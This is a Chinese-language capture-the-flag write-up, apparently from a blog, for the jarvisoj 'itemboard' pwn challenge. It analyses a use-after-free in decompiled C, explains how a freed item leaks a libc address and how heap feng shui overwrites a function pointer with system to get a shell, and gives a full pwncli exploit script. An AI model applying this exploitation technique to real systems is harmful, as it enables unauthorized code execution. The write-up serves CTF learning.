jarvisoj_itemboard
作者:互联网
itemboard
逆向分析
ADD:
void __cdecl new_item()
{
int v0; // eax
char buf[1024]; // [rsp+0h] [rbp-410h] BYREF
int content_len; // [rsp+404h] [rbp-Ch]
Item *item; // [rsp+408h] [rbp-8h]
item = (Item *)malloc(0x18uLL);
v0 = items_cnt++;
item_array[v0] = item;
item->name = (char *)malloc(0x20uLL);
item->free = (void (*)(ItemStruct *))item_free;
puts("New Item");
puts("Item name?");
fflush(stdout);
read_until(0, buf, 32, 10);
strcpy(item->name, buf);
puts("Description's len?");
fflush(stdout);
content_len = read_num();
item->description = (char *)malloc(content_len);
puts("Description?");
fflush(stdout);
read_until(0, buf, content_len, 10);
strcpy(item->description, buf);
puts("Add Item Successfully!");
}
可以看出每次创建两个chunk,如下图:
其中,description_chunk_prt的size大小是我们可控的
点击item_free,可以看到
void __cdecl item_free(Item *item)
{
free(item->name);
free(item->description);
free(item);
}
以及看整个程序逻辑可以看出这个是remove_item的关键,而且没有进行 item_array[idx] = 0 的操作。
漏洞利用
存在UAF,我们可以利用UAF来leak libc.address ,然后利用堆风水将item_free替换为system。
堆风水
函数指针存在于每次申请的第一个0x18大小的chunk,我们申请一次用来leak,第二次申请的时候随便申请。我们free掉这两次申请的所有chunk,会发现存在函数指针的chunk皆为0x18,如下图:
而且item_array[0],[1]记录着这两个chunk,我们可以进行add('a' * 16, 0x18, '/bin/sh;aaaaaaaa' + p64(system_addr)),将0x4c这个chunk当成idx 3的chunk的description_chunk,此时 item_array[0].item_free = item_array[3].description,与此同时item_array[3].description,即item_array[0].item_free,中的函数指针被修改为system,然后free(0),完成getshell
EXP
#!/usr/bin/env python3
'''
Author: 7resp4ss
Date: 2022-09-12 19:34:48
LastEditTime: 2022-09-12 22:40:02
Description:
'''
from pwncli import *
cli_script()
io = gift['io']
elf = gift['elf']
libc = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
libc = ELF("./libc-2.23.so")
gift['libc'] = libc
def add(name, length, desc):
io.sendlineafter("choose:", "1")
io.sendlineafter("Item name?\n", name)
io.sendlineafter("Description's len?\n", str(length))
io.sendlineafter("Description?\n", desc)
def show(idx):
io.sendlineafter("choose:", "3")
io.sendlineafter("Which item?\n", str(idx))
def delete(idx):
io.sendlineafter("choose:", "4")
io.sendlineafter("Which item?\n", str(idx))
add('aaaa', 0x80, 'bbbb')
add('dddd', 0x20, 'aaaa')
delete(0)
show(0)
malloc_hook = recv_current_libc_addr(88+0x10) #leak_address - 88 - 0x10
log_address_ex2(malloc_hook)
lb = set_current_libc_base_and_log(malloc_hook,'__malloc_hook')
system_addr = libc.sym['system']
log_address_ex2(system_addr)
delete(1)
add('a' * 16, 24, '/bin/sh;aaaaaaaa' + p64(system_addr))
delete(0)
io.interactive()
./exp.py de ./itemboard -b base+0xb0e -u
标签:itemboard,gift,libc,chunk,free,item,io,jarvisoj 来源: https://www.cnblogs.com/7resp4ss/p/16687713.html